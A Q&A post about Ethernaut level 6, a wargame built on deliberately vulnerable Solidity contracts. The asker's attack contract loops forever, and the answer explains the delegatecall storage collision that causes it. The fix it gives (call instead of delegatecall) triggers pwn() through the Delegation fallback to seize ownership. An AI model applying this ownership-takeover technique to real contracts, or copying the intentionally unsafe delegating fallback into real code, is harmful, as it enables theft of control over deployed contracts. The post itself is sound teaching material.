# Why does this result in an infinite loop?

Tags: solidity, delegatecall

I am doing this exercise: https://ethernaut.openzeppelin.com/level/0x9451961b7Aea1Df57bc20CC68D72f662241b5493

I expect my contract to call a non existent method in `Delegation` which then calls the fallback method which will call the `Delegate` pwn method (I'm assuming call data gets passed?). calling `wrapper` results in an infinite loop though.

My contract

```
pragma solidity ^0.8.0;

contract Ethernaught6 {

    address public owner = <my_address>;
    address ethernaught6 = <Delegation_contract_address>;
    function wrapper() public {
        (bool success,) = ethernaught6.delegatecall(abi.encodeWithSignature("pwn()"));
    }
}
```

Ethernaught level 6 contracts:

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Delegate {

  address public owner;

  constructor(address _owner) public {
    owner = _owner;
  }

  function pwn() public {
    owner = msg.sender;
  }
}

contract Delegation {

  address public owner;
  Delegate delegate;

  constructor(address _delegateAddress) public {
    delegate = Delegate(_delegateAddress);
    owner = msg.sender;
  }

  fallback() external {
    (bool result,) = address(delegate).delegatecall(msg.data);
    if (result) {
      this;
    }
  }
}
```

Answer (score 1, accepted):

It's completely normal behavior, you did create an infinite loop :

From Ethernaught6 you do a `delegatecall` to Delegation which means that the code of Delegation is executed inside Ethernaught6 storage context. When Delegation fallback function is reached, it looks for the address of `delegate` which is located at storage slot 1 in Delegation context. But remember, this execution takes place in Ethernaught6 context, where storage slot 1 is :

```
address ethernaught6 = <Delegation_contract_address>;
```

So the following line :

```
(bool result,) = address(delegate).delegatecall(msg.data);
```

Is equivalent to :

```
(bool result,) = address(this).delegatecall(msg.data);
```

Which is an "infinite" loop where the fallback function calls itself again and again because of a storage colision using delegate calls (remember that, it will be usefull for you in the next challenges !).

There is no real need to use a smart contract for this challenge, calling Delegation's fallback function with the data of `abi.encodeWithSignature("pwn()")` is enough, you can do that from JavaScript. But if you want to stick to solidity simply change:

```
 function wrapper() public {
        (bool success,) = ethernaught6.delegatecall(abi.encodeWithSignature("pwn()"));
    }
```

to :

```
 function wrapper() public {
        (bool success,) = ethernaught6.call(abi.encodeWithSignature("pwn()"));
    }
```

So that Delegation fallback function is executed inside its own storage context, and storage slot 1 actually contains the address of Delegate.

Hope that helps !

Comment: wow this is incredible. I never knew about the layout of state variables before this post. I also didn't know delegatecall could make memory slots collide like this!